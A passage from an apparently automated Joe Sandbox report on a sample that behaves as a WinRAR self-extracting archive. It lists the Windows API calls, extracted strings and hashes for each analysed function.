__vsnwprintf_l 25347->25355 25348 ccaa73 25351 ccaf6c __vswprintf_c_l 11 API calls 25348->25351 25348->25354 25349->25355 25350 ccab41 25368 ccabc3 20 API calls _free 25350->25368 25351->25354 25353 ccaf6c __vswprintf_c_l 11 API calls 25356 ccab20 25353->25356 25369 ccabc3 20 API calls _free 25354->25369 25355->25350 25355->25353 25356->25350 25357 ccab2f WideCharToMultiByte 25356->25357 25357->25350 25358 ccab6f 25357->25358 25370 ccabc3 20 API calls _free 25358->25370 25361 ccac98 _abort 
5 API calls 25360->25361 25362 ccaf93 25361->25362 25365 ccaf9c 25362->25365 25371 ccaff4 10 API calls 3 library calls 25362->25371 25364 ccafdc LCMapStringW 25364->25365 25366 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25365->25366 25367 ccaa60 25366->25367 25367->25347 25367->25348 25367->25354 25368->25354 25369->25337 25370->25354 25371->25364 25407 ccc030 GetProcessHeap

Control-flow Graph

APIs
  • Part of subcall function 00CB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
  • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
  • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
  • Part of subcall function 00CBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CBA655
  • Part of subcall function 00CBAC16: OleInitialize.OLE32(00000000), ref: 00CBAC2F
  • Part of subcall function 00CBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
  • Part of subcall function 00CBAC16: SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
• GetCommandLineW.KERNEL32 ref: 00CBDF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CBDF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CBDF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 00CBDFCE
  • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
  • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
• CloseHandle.KERNEL32(00000000), ref: 00CBDFD7
• GetModuleFileNameW.KERNEL32(00000000,00CFEC90,00000800), ref: 00CBDFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,00CFEC90), ref: 00CBDFFE
• GetLocalTime.KERNEL32(?), ref: 00CBE009
• _swprintf.LIBCMT ref: 00CBE048
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CBE05A
• GetModuleHandleW.KERNEL32(00000000), ref: 00CBE061
• LoadIconW.USER32(00000000,00000064), ref: 00CBE078
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CBE0C9
                                                                                              • Sleep.KERNEL32(?), ref: 00CBE0F7
                                                                                              • DeleteObject.GDI32 ref: 00CBE130
                                                                                              • DeleteObject.GDI32(?), ref: 00CBE140
                                                                                              • CloseHandle.KERNEL32 ref: 00CBE183
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3049964643-3743209390

                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                                                • Part of subcall function 00CBA626: GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 211097158-364855578

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA728
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA734
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002,00000000), ref: 00CC7E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002,00000000), ref: 00CC7E16
                                                                                              • ExitProcess.KERNEL32 ref: 00CC7E28
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CBB7E5
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBB8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00CBB902
                                                                                              • TranslateMessage.USER32(?), ref: 00CBB910
                                                                                              • DispatchMessageW.USER32(?), ref: 00CBB91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CBB93D
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CBB960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBB983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBB99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBB9B1
                                                                                                • Part of subcall function 00CBD453: _wcslen.LIBCMT ref: 00CBD47D
                                                                                              • SetFocus.USER32(00000000), ref: 00CBB9B8
                                                                                              • _swprintf.LIBCMT ref: 00CBBA24
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                                • Part of subcall function 00CBD4D4: GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                                                                • Part of subcall function 00CBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CBBA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CBBA90
                                                                                              • GetTickCount.KERNEL32 ref: 00CBBAAE
                                                                                              • _swprintf.LIBCMT ref: 00CBBAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00CBBAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CBBB43
                                                                                              • _swprintf.LIBCMT ref: 00CBBB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CBBBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 00CBBBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CBBC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CBBC6F
                                                                                              • Sleep.KERNEL32(00000064), ref: 00CBBCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CBBCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBBCEB
                                                                                              • _swprintf.LIBCMT ref: 00CBBD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00CD35F4), ref: 00CBBD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBBD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBBDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CBBDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBE68
                                                                                              • _wcslen.LIBCMT ref: 00CBBEBE
                                                                                              • _swprintf.LIBCMT ref: 00CBBEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBBF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CBBF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBBF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CBBF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBBF85
                                                                                              • SetWindowTextW.USER32(00000000,00CEA472), ref: 00CBBFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CBC007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CBC0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00CBC197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CBC1D9
                                                                                                • Part of subcall function 00CBC73F: __EH_prolog.LIBCMT ref: 00CBC744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC1FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3445078344-2238251102
                                                                                              • Opcode ID: 87bd478585e532fa634fa8d0ce7ca3ae21237732202ef745e70eb8ea02cee49f
                                                                                              • Instruction ID: 58acf8636aab97359d517737fcdfb19e305b51ced1f4daab384fd97a2fdc5da4
                                                                                              • Opcode Fuzzy Hash: 87bd478585e532fa634fa8d0ce7ca3ae21237732202ef745e70eb8ea02cee49f
                                                                                              • Instruction Fuzzy Hash: E142E670944399BEEB219BB09C8AFFE7B7CAB01700F040055F655E61E2CBB49E45DB62

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB0B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB0B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00CD3C7C,00000000), ref: 00CB0BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CB0C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CD3C7C,?,00000000,?,00000800), ref: 00CB0C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00CD3C7C,00000800,?,00000000,?,00000800), ref: 00CB0C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00CD3D44,00000800), ref: 00CB0CD8
                                                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              • _swprintf.LIBCMT ref: 00CB0D4A
                                                                                              • _swprintf.LIBCMT ref: 00CB0D96
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • AllocConsole.KERNEL32 ref: 00CB0D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00CB0DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00CB0DAF
                                                                                              • _wcslen.LIBCMT ref: 00CB0DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CB0DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00CB0DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00CB0DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00CB0DED
                                                                                              • ExitProcess.KERNEL32 ref: 00CB0DF5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1207345701-3298887752
                                                                                              • Opcode ID: b6691015d11a73f0fd585984e586f79b774796336c63363de6f45899c061cc30
                                                                                              • Instruction ID: 0837d853fbedae741bdb9098857ec13a266dc29f47764ac0f82345a9ecbc4401
                                                                                              • Opcode Fuzzy Hash: b6691015d11a73f0fd585984e586f79b774796336c63363de6f45899c061cc30
                                                                                              • Instruction Fuzzy Hash: 67D151F10093C5ABDB219F50C849BDFBBE8BB85704F50491EF39996291DBB09648CB63

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CBC744
                                                                                                • Part of subcall function 00CBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CBB3FB
                                                                                              • _wcslen.LIBCMT ref: 00CBCA0A
                                                                                              • _wcslen.LIBCMT ref: 00CBCA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00CBCA71
                                                                                              • _wcslen.LIBCMT ref: 00CBCAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CBCBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBCC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CBCC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00CEA472), ref: 00CBCC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CBCC7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: cc3b44dacd8516891cb6563d071c887e69dc8ded44e163978a380aed239c23d3
                                                                                              • Instruction ID: 99991f081c396ea5f5c39c5bf91783011645443057f5cbca505dfc2e25d467af
                                                                                              • Opcode Fuzzy Hash: cc3b44dacd8516891cb6563d071c887e69dc8ded44e163978a380aed239c23d3
                                                                                              • Instruction Fuzzy Hash: 7EE163B2900259AADF24DBA0DC85EEE73BCAB04350F4040AAF619E7151EF749F44DF61
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CADA70
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CADAAC
                                                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046E), ref: 00CB1BA0
                                                                                              • _wcslen.LIBCMT ref: 00CADDE9
                                                                                              • __fprintf_l.LIBCMT ref: 00CADF1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 50413f5131542283e80c6a4eb681899b5a0182619a3188892206dff28bbd7b2a
                                                                                              • Instruction ID: 6d56771bd560053d599df51ece3dc9d08da540f73b5aaeae0e59d90d1d6c32d3
                                                                                              • Opcode Fuzzy Hash: 50413f5131542283e80c6a4eb681899b5a0182619a3188892206dff28bbd7b2a
                                                                                              • Instruction Fuzzy Hash: AA32047190021A9BCF24EF68CC41BEE77A4FF06708F40456AFA1697291E7B1DE85DB90

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              • GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                                                              • Instruction ID: c39e62f4638d847c33ca38c41e0333dbb4e60431581dc3b1e2302ce7c6d92fc2
                                                                                              • Opcode Fuzzy Hash: 813c7f564e031d96277e55b2fe2ec08334bf520c93227eec9fc8d7ed16edec66
                                                                                              • Instruction Fuzzy Hash: E431CF71146346AFE311DF21AC4AFAB7FACEB86704F000518F655D62E0EB748A0887B6

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CBD7AE
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00CBD8DE
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00CBD91D
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00CBD959
                                                                                              • CloseHandle.KERNEL32(?), ref: 00CBD97F
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00CBD9E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
